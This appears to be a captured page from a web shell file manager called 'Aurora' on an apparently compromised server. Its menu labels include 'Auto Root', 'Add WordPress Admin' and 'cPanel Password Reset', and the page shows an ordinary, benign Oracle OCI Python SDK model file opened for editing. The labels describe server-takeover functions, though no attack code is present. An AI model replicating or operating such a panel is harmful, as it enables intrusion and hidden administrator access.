Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
lib
python3.9
site-packages
oci
opsi
models
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: enable_autonomous_database_insight_advanced_features_details.py
# coding: utf-8 # Copyright (c) 2016, 2024, Oracle and/or its affiliates. All rights reserved. # This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license. # NOTE: This class is auto generated by OracleSDKGenerator. DO NOT EDIT. API Version: 20200630 from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401 from oci.decorators import init_model_state_from_kwargs @init_model_state_from_kwargs class EnableAutonomousDatabaseInsightAdvancedFeaturesDetails(object): """ The advanced feature details for autonomous database to be enabled. """ def __init__(self, **kwargs): """ Initializes a new EnableAutonomousDatabaseInsightAdvancedFeaturesDetails object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param opsi_private_endpoint_id: The value to assign to the opsi_private_endpoint_id property of this EnableAutonomousDatabaseInsightAdvancedFeaturesDetails. :type opsi_private_endpoint_id: str :param connection_details: The value to assign to the connection_details property of this EnableAutonomousDatabaseInsightAdvancedFeaturesDetails. :type connection_details: oci.opsi.models.ConnectionDetails :param credential_details: The value to assign to the credential_details property of this EnableAutonomousDatabaseInsightAdvancedFeaturesDetails. :type credential_details: oci.opsi.models.CredentialDetails """ self.swagger_types = { 'opsi_private_endpoint_id': 'str', 'connection_details': 'ConnectionDetails', 'credential_details': 'CredentialDetails' } self.attribute_map = { 'opsi_private_endpoint_id': 'opsiPrivateEndpointId', 'connection_details': 'connectionDetails', 'credential_details': 'credentialDetails' } self._opsi_private_endpoint_id = None self._connection_details = None self._credential_details = None @property def opsi_private_endpoint_id(self): """ Gets the opsi_private_endpoint_id of this EnableAutonomousDatabaseInsightAdvancedFeaturesDetails. The `OCID`__ of the OPSI private endpoint __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm :return: The opsi_private_endpoint_id of this EnableAutonomousDatabaseInsightAdvancedFeaturesDetails. :rtype: str """ return self._opsi_private_endpoint_id @opsi_private_endpoint_id.setter def opsi_private_endpoint_id(self, opsi_private_endpoint_id): """ Sets the opsi_private_endpoint_id of this EnableAutonomousDatabaseInsightAdvancedFeaturesDetails. The `OCID`__ of the OPSI private endpoint __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm :param opsi_private_endpoint_id: The opsi_private_endpoint_id of this EnableAutonomousDatabaseInsightAdvancedFeaturesDetails. :type: str """ self._opsi_private_endpoint_id = opsi_private_endpoint_id @property def connection_details(self): """ **[Required]** Gets the connection_details of this EnableAutonomousDatabaseInsightAdvancedFeaturesDetails. :return: The connection_details of this EnableAutonomousDatabaseInsightAdvancedFeaturesDetails. :rtype: oci.opsi.models.ConnectionDetails """ return self._connection_details @connection_details.setter def connection_details(self, connection_details): """ Sets the connection_details of this EnableAutonomousDatabaseInsightAdvancedFeaturesDetails. :param connection_details: The connection_details of this EnableAutonomousDatabaseInsightAdvancedFeaturesDetails. :type: oci.opsi.models.ConnectionDetails """ self._connection_details = connection_details @property def credential_details(self): """ **[Required]** Gets the credential_details of this EnableAutonomousDatabaseInsightAdvancedFeaturesDetails. :return: The credential_details of this EnableAutonomousDatabaseInsightAdvancedFeaturesDetails. :rtype: oci.opsi.models.CredentialDetails """ return self._credential_details @credential_details.setter def credential_details(self, credential_details): """ Sets the credential_details of this EnableAutonomousDatabaseInsightAdvancedFeaturesDetails. :param credential_details: The credential_details of this EnableAutonomousDatabaseInsightAdvancedFeaturesDetails. :type: oci.opsi.models.CredentialDetails """ self._credential_details = credential_details def __repr__(self): return formatted_flat_dict(self) def __eq__(self, other): if other is None: return False return self.__dict__ == other.__dict__ def __ne__(self, other): return not self == other